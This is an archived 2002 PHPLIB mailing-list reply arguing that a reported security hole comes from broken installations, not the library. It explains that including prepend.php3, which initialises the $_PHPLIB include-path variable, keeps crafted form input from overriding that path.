Re: [Phplib-users] security hole ... NOT!
Brought to you by:
nhruby,
richardarcher
Menu
▾
▴
Re: [Phplib-users] security hole ... NOT!
|
From: Richard A. <rh...@ju...> - 2002-03-02 23:55:39
|
This is not a security flaw in PHPLIB. There was once a problem with _PHPLIB handling, but that was fixed back in July 2001 with the release of 7.2d. The "test cases" described are due to a broken installation of PHPLIB, not a flaw in the library. To avoid the possibility of remote code being executed on PHPLIB pages, prepend.php3 must be included at the start of any file which uses PHPLIB. It contains the lines: $_PHPLIB = array(); # Can't control your include path? # Point this to your PHPLIB base directory. Use a trailing "/"! $_PHPLIB["libdir"] = ""; This initialises the include path variable so that it cannot be overridden by crafted form input. ...R. |
